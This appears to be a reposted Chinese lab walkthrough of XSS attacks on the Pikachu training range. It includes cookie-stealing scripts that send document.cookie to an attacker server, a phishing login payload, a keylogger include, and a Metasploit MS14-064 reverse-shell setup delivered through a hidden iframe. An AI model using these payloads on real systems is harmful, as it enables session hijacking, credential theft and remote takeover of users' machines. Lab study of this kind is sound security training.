当前位置:   article > 正文

XSS解析——pikachu靶场_pikachu利用反射型xss,盗取用户的cookie, 把后台盗取的cookie页面截图

pikachu利用反射型xss,盗取用户的cookie, 把后台盗取的cookie页面截图

XSS漏洞出现的原因

       程序对输入和输出控制不够严格,导致恶意构造的脚本输入后,在输出到前端时被浏览器当作有效代码解析执行而产生危害

XSS分类

反射型XSS

储存性XSS

DOM型XSS

XSS的危害

劫持用户COOKIE

Cookie是用户对于特定网站的身份验证标志。XSS可以盗取用户的Cookie,从而利用该Cookie获取用户对该网站的操作权限。

反射型XSS(get)

首先,试试直接获取本地的cookie

先修改字符长度的限制

然后输入

<script>alert(document.cookie)</script>

就能获取cookie

利用这个原理可以尝试截取其他用户的cookie

方法一:

提前在攻击机上写好js代码evil.js

  1. var img=document.createElement("img");
  2. img.src="http://192.168.111.130/log?"+escape(document.cookie);
  3. document.body.appendChild(img);

这段代码在页面中插入了一张看不见的图片,同时把 document.cookie 对象作为参数发送到远程服务器,这样,就完成了一个简单的窃取 Cookie 的 XSS Payload

 构造payload

http://192.168.111.130/pikachu-master/vul/xss/xss_reflected_get.php?message=<script src=http://192.168.111.130/evil.js></script>&submit=submit

将链接发给用户,用户点击链接

就可以获取用户的cookie

该方式是攻击者没有使用自己的服务器情况下。

方法二:

攻击者使用自己的服务器

Pikachu靶机中的pkxss文件复制到攻击机中的站点WWW下

将重定向的ip改为漏洞服务器的地址

在页面进行输入

<script>document.location='http://192.168.111.130/pikachu-master/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

别忘记将字符长度的限制给修改掉

刷新一下页面,打开xss后台

将referer里的内容发给用户

用户访问这个链接,我们就能获得他的cookie值 

反射型XSS(post)

首先登陆

post是不会显示在url里,所以需要使用burpsuite抓包更改

这时候我们不能直接把我们的恶意代码嵌入到url中

需要诱导受害者点击http://192.168.111.130/pkxss/xcookie/post.html链接就能窃取用户的Cookie

 

框架钓鱼

利用目标网站的反射型跨站脚本漏洞将目标网站重定向到钓鱼网站,或者注入钓鱼JavaScript以监控目标网站的表单输入。

利用 JavaScript 在当前页面上“画出”一个伪造的登录框,当用户在登录框中输入用户名与密码后,其密码将被发送至攻击者的服务器上。

存储型XSS

获取cookie一样,钓鱼的后台也有个接口(xfish.php)

更改fish文件的ip

构造一个payload嵌入到网页中,让用户每次访问这个页面时都会执行我们的payload

<script src="http://192.168.111.130/pikachu-master/pkxss/xfish/fish.php"></script>

访问fish.php文件

判断用户是否输入了账号和密码

如果没有输入会弹出

当输入账号和密码的时候他就会带着账号和密码访问另一个文件xfish.php

把传来的账号和密码上传到攻击者的数据库中。

刷新页面

挂马

利用IFrame嵌入隐藏的恶意网站或者将被攻击者定向到恶意网站

存储型XSS

首先制作木马服务器

使用MS14_064漏洞

该漏洞影响范围为Win95+IE3 – Win10+IE11全版本,形成被攻击主机缓冲区溢出,触发该漏洞须要客户端安装有power shell软件

kali作为攻击机

Kali自带的msf

root@kali:~# msfconsole         # 启动msf

msf5 > msfdb init                     # 初始化数据库

msf5 > db_status                     # 查看MSF数据库链接状态

msf5 > search MS14_064       # 搜索MS14_064漏洞

msf 5> use exploit/windows/browser/ms14_064_ole_code_execution      # 调用这个exploit

msf5 exploit(ms14_064_ole_code_execution) > set payload windows/meterpreter/reverse_tcp

# 设置调用的payload

msf5 exploit(ms14_064_ole_code_execution) > set lhost 192.168.111.178   

# 设置监听IP(kali的IP)

msf5 exploit(ms14_064_ole_code_execution) > set lport 4444          # 设置监听端口

msf5 exploit(ms14_064_ole_code_execution) >exploit      # 输入exploit(或者run)开启攻击服务

kali 的web服务已开启,并生成了一个URL

存在MS14_064漏洞的主机访问该URL就会被控制

使用window7作为靶机

访问上面的URL

kali马上提示已发送exploit至目标主机,而且打开了一个链接

使用session -l 命令可以查看当前有会话的主机的id

session -i +id号,kali就能够连上靶机(win7)

输入shell,成功取得靶机的shell

然后网页挂马

在留言板内输入payload:

<script src="kali生成的URL"></script>

<iframe src="kali生成的URL" height=0 weight=0 frameboder=0></iframe>

使用靶机浏览器访问这个挂马网页,kali就可以连接成功了

攻击者可以将这个网页发给用户

用户点击该链接

攻击者就能实现挂马

键盘记录

通过受害者访问已经被插入XSS代码的网站,触发js脚本,记录受害者在当前网站的键盘操作,传输到我们接收的网站

存储型XSS

修改为 

插入js标签

<script src="http://192.168.10.130/pikachu-master/pkxss/rkeypress/rk.js"></script>

后在文本框内输入内容

查看后台

注意:如果无法记录数据,需关闭浏览器的同源策略Access-Contrl-Allow-Origin

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/盐析白兔/article/detail/150101
推荐阅读
相关标签
  

闽ICP备14008679号